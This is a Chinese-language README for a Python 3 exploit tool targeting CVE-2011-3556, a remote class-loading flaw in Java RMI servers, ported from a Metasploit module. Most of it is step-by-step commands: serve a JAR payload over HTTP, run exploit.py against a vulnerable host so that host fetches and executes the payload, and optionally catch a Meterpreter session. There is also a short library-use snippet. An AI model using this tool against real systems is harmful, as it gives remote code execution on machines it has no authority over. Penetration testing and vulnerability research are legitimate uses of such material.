此工具是现有Metasploit框架中由mihi开发的概念验证 (PoC)的Python 3实现。
使用此模块只需按照以下说明操作:
# 将该仓库克隆到本地。
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/
# 可选地设置`x`位以能够直接执行脚本。
$ chmod u+x exploit.py
$ ./exploit.py --help && echo "It works!"
为了被易受攻击的Java RMI服务器远程加载,有效载荷(一个JAR二进制文件)必须作为HTTP资源提供。可以使用著名的python3 -m http.server快速提供。
一旦有效载荷可供下载,只需执行exploit.py脚本即可触发漏洞。
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`
如果有效载荷是一个Meterpreter(Metasploit框架),不要忘记
use exploit/multi/handler。
此模块也可以作为库使用,将cve_2011_3556模块导入到当前命名空间:
from cve_2011_3556 import JavaRMIExploit
JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()
就是这么简单!
特别感谢mihi对Metasploit框架模块的初始实现。